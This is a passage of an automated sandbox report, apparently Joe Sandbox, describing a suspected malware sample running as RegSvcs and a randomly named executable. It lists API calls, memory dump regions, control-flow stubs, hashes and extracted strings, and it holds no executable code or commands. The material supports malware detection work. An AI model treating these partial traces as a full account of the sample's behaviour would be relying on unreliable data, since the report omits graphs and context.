                                                                          • RTL: Re-Waiting, xrefs: 015572C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$@
                                                                          • API String ID: 0-1194432280

                                                                          Execution Graph

                                                                          Execution Coverage:9.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:56
                                                                          Total number of Limit Nodes:4
                                                                          execution_graph: node and edge list omitted. API calls named in the graph: GetModuleHandleW, DuplicateHandle, CreateIconFromResourceEx, CreateActCtxA, DrawTextExW.

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph starting at 274b2b7: node and edge list omitted. API call named in the graph: GetModuleHandleW (274b500-274b52b).
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2277008849.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_2740000_uFEeKIucsX.jbxd

                                                                          Control-flow Graph (image not reproduced; first node 591: 2745dcc-2745e99, CreateActCtxA)
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 02745E89
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2277008849.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_2740000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0

                                                                          Control-flow Graph (image not reproduced; first node 607: 2744544-2745e99, CreateActCtxA)
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 02745E89
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2277008849.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_2740000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0

                                                                          Control-flow Graph (image not reproduced; first node 624: 55f7668-55f767a)
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2281294210.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_55f0000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFromIconResource
                                                                          • String ID:
                                                                          • API String ID: 3668623891-0

                                                                          Control-flow Graph (image not reproduced; first node 636: 55f419c-55f6864)
                                                                          APIs
                                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,055F67FD,?,?), ref: 055F68AF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2281294210.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_55f0000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText
                                                                          • String ID:
                                                                          • API String ID: 2175133113-0

                                                                          Control-flow Graph (image not reproduced; first node 646: 55f6810-55f6864)
                                                                          APIs
                                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,055F67FD,?,?), ref: 055F68AF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2281294210.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_55f0000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText
                                                                          • String ID:
                                                                          • API String ID: 2175133113-0

                                                                          Control-flow Graph (image not reproduced; first node 656: 274d308-274d83c, DuplicateHandle)
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0274D76E,?,?,?,?,?), ref: 0274D82F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2277008849.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_2740000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0

                                                                          Control-flow Graph (image not reproduced; first node 662: 55f420c-55f7734, CreateIconFromResourceEx)
                                                                          APIs
                                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,055F7682,?,?,?,?,?), ref: 055F7727
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2281294210.00000000055F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_55f0000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFromIconResource
                                                                          • String ID:
                                                                          • API String ID: 3668623891-0

                                                                          Control-flow Graph (image not reproduced; first node 668: 274b4b8-274b4f8)
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0274B51E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2277008849.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_2740000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 818be44ef46a84ba21e1048f0467224190669ad2bd5d1cdb6c4302e35fa25823
                                                                          • Instruction ID: 00b4d6127efd2583b95c4c0aaf0e9da161e8ed7814452040717ba486b12820a0
                                                                          • Opcode Fuzzy Hash: 818be44ef46a84ba21e1048f0467224190669ad2bd5d1cdb6c4302e35fa25823
                                                                          • Instruction Fuzzy Hash: 6611E0B5C013598FCB10CF9AD544ADEFBF4EF88318F15846AD819A7210D375A545CFA1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b996209f8d1aa93c09c43bca4cc93e862329d438c1e339e81fc6b24af71e354
                                                                          • Instruction ID: 5dcdedebbf560b7cf58456c4a3778ee18cff2d116fdd2a78a06d25ac0a866d74
                                                                          • Opcode Fuzzy Hash: 1b996209f8d1aa93c09c43bca4cc93e862329d438c1e339e81fc6b24af71e354
                                                                          • Instruction Fuzzy Hash: 632145B1508240DFCB11DF14DDC0BA7BF65FB88318F34C569E8091B256D336D816CAA1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ad0e1a1dd27a5c45cd733f8c8f9ee0a02ae8f4ca764554e1594719b7243972b
                                                                          • Instruction ID: 25659fce18060684a2278231158245ff7f0e75f2219c44c33de50d6b8441c1bb
                                                                          • Opcode Fuzzy Hash: 7ad0e1a1dd27a5c45cd733f8c8f9ee0a02ae8f4ca764554e1594719b7243972b
                                                                          • Instruction Fuzzy Hash: 6D2148B1508204DFDB05DF04DDC0B57BF65FB94324F24C569D9095B246D336E816C6A2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276765285.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ecd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5cc946ff2e8ed07fb3873382f59b95e8e367f4951a4cc5bf7eb99a91f4108b7a
                                                                          • Instruction ID: 7625de2f02fcbd90c83d95f8b2766bff60433b9a400d93f8809261f6d69afb90
                                                                          • Opcode Fuzzy Hash: 5cc946ff2e8ed07fb3873382f59b95e8e367f4951a4cc5bf7eb99a91f4108b7a
                                                                          • Instruction Fuzzy Hash: 8621D371508240DFDB14DF18DAC5F16BBA6EB84318F24C57DD84A5B286C337D807CA61
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276765285.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ecd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a19bea782ca64dbdeaad8ad30374565ea43e1965f37ad661647e96726744fc19
                                                                          • Instruction ID: 465f586aba2ce2bb3e91448e1e77e74ef91207155cb068493aa676bc9073d75f
                                                                          • Opcode Fuzzy Hash: a19bea782ca64dbdeaad8ad30374565ea43e1965f37ad661647e96726744fc19
                                                                          • Instruction Fuzzy Hash: 6221CFB1508204AFDB09DF54DA80F26BBA5FB84318F24C57DE8495B2A2C337D817CA61
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276765285.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ecd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d2059866ad7bc0f3ff610878a85afe475ecf0e09f063f2142d8710f94f9b767
                                                                          • Instruction ID: 3eb18afa7ead5d92aa513fd1d7871baba7bd535d9d3b33b93f425ea90f251db7
                                                                          • Opcode Fuzzy Hash: 6d2059866ad7bc0f3ff610878a85afe475ecf0e09f063f2142d8710f94f9b767
                                                                          • Instruction Fuzzy Hash: 502141755093809FD712CF24D994B15BF71EB46214F28C5EAD8498B6A7C33B980BCB62
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction ID: 3f9ee7cbc4e9f1751500412f763949adc14b37045f8894d8554ac28027d6ae03
                                                                          • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction Fuzzy Hash: 28112672404280CFCB12CF10D9C4B56BF71FB94328F24C6A9D8490B656C33AD85ACBA1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction ID: 7e50cad51fab55e6517647922f10dee5c8463f8a51176bc1a156387a23ab6cc1
                                                                          • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction Fuzzy Hash: 82112672404240CFCB12CF00D9C4B56BF71FB94324F24C6A9D9090B656C33AE85ACBA2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276765285.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ecd000_uFEeKIucsX.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                          • Instruction ID: 8162b6ff101676eef936db67e1cb3cb45e37599ae65d37b789414c52ed460284
                                                                          • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                          • Instruction Fuzzy Hash: 1411BE75508240DFCB05CF50DAC4B15BB61FB84318F24C6ADD8494B666C33BD81ACB51
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2276661618.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_ebd000_uFEeKIucsX.jbxd

                                                                          Execution Graph

                                                                          Execution Coverage:0.1%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:5
                                                                          Total number of Limit Nodes:1
                                                                          execution_graph 62174 1162df0 LdrInitializeThunk 62176 1162c00 62178 1162c0a 62176->62178 62179 1162c11 62178->62179 62180 1162c1f LdrInitializeThunk 62178->62180

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 1162c0a-1162c0f 1 1162c11-1162c18 0->1 2 1162c1f-1162c26 LdrInitializeThunk 0->2
                                                                          APIs
                                                                          • LdrInitializeThunk.NTDLL(0117FD4F,000000FF,00000024,01216634,00000004,00000000,?,-00000018,7D810F61,?,?,01138B12,?,?,?,?), ref: 01162C24
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0

                                                                          Control-flow Graph

                                                                          control_flow_graph 4 1162df0-1162dfc LdrInitializeThunk
                                                                          APIs
                                                                          • LdrInitializeThunk.NTDLL(0119E73E,0000005A,011FD040,00000020,00000000,011FD040,00000080,01184A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0116AE00), ref: 01162DFA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0

                                                                          Control-flow Graph

                                                                          control_flow_graph 5 11635c0-11635cc LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0

                                                                          Control-flow Graph

                                                                          control_flow_graph 18 42e443-42e484 call 42e933 22 42e486-42e4a3 18->22 23 42e4de-42e4e3 18->23 25 42e4b6-42e4db 22->25 26 42e4a5-42e4ad 22->26 25->23 27 42e4b3 26->27 27->25
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd

                                                                          Control-flow Graph

                                                                          control_flow_graph 6 42e43e-42e45a 7 42e469-42e470 6->7 8 42e464 call 42e933 6->8 9 42e47f-42e484 7->9 8->7 10 42e486-42e48f 9->10 11 42e4de-42e4e3 9->11 12 42e49e-42e4a3 10->12 13 42e4b6-42e4db 12->13 14 42e4a5-42e4ad 12->14 13->11 15 42e4b3 14->15 15->13
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd

                                                                          Control-flow Graph

                                                                          control_flow_graph 30 42e7f7-42e801 31 42e803-42e82e 30->31 32 42e834-42e845 31->32
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd

                                                                          Control-flow Graph

                                                                          control_flow_graph 33 42e969-42e988 34 42e98e-42e995 33->34 35 42e997-42e999 34->35 36 42e9a9-42e9ac 34->36 35->36 37 42e99b-42e9a7 call 42e933 35->37 37->36
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd

                                                                          Control-flow Graph

                                                                          control_flow_graph 42 42e973-42e988 43 42e98e-42e995 42->43 44 42e997-42e999 43->44 45 42e9a9-42e9ac 43->45 44->45 46 42e99b-42e9a7 call 42e933 44->46 46->45
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd

                                                                          Control-flow Graph

                                                                          control_flow_graph 40 42e803-42e82e 41 42e834-42e845 40->41
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd

                                                                          Control-flow Graph

                                                                          control_flow_graph 49 42e893-42e8a6 50 42e8ac-42e8b0 49->50
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd

                                                                          Control-flow Graph

                                                                          control_flow_graph 51 1164a80-1164a8b 52 1164a9f-1164aa6 51->52 53 1164a8d-1164a99 RtlDebugPrintTimes 51->53 54 1164aaf-1164ab6 call 114f5a0 52->54 55 1164aa8-1164aae 52->55 53->52 58 1164b25-1164b26 53->58 60 1164b23 54->60 61 1164ab8-1164b22 call 1151e46 * 2 54->61 60->58 61->60
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: 0Iv$0Iv$0Iv$0Iv$0Iv$0Iv
                                                                          • API String ID: 3446177414-2083360775

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID:
                                                                          • API String ID: 48624451-0
                                                                          • Opcode ID: 2ffddb0a35f4133ba196b4b37f91d802fbc65dc3e73c794b34b306dd9b87b5a3
                                                                          • Instruction ID: 2ba4efefba175c9783a044ff9f5260d99f295b6afb249f79cc2384b97eaa1d91
                                                                          • Opcode Fuzzy Hash: 2ffddb0a35f4133ba196b4b37f91d802fbc65dc3e73c794b34b306dd9b87b5a3
                                                                          • Instruction Fuzzy Hash: D451F5B2A00216AFDB1DDB9C8C9097EFBBCBB49240714C229E4A5D7645E375DE148BA0

                                                                          Control-flow Graph

                                                                          Strings
                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011879FA
                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 011879D0, 011879F5
                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011879D5
                                                                          • SsHd, xrefs: 0113A3E4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                          • API String ID: 0-929470617
                                                                          • Opcode ID: f4f79f57adb79422fd90b917157567f307b9f3ace3f00aff55d6cbc58fb0a1b3
                                                                          • Instruction ID: 0ba232c0d5b3d5cf41f058b6593831bc9f36888f55839b95f86a9e8ad3c5788f
                                                                          • Opcode Fuzzy Hash: f4f79f57adb79422fd90b917157567f307b9f3ace3f00aff55d6cbc58fb0a1b3
                                                                          • Instruction Fuzzy Hash: 62E1D3716083028FD72DCE28D484B6ABBE0AFC5324F194A2DE9E5CB2D5E731D945CB42

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          • GsHd, xrefs: 0113D874
                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0118936B
                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 01189341, 01189366
                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01189346
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                          • API String ID: 3446177414-576511823
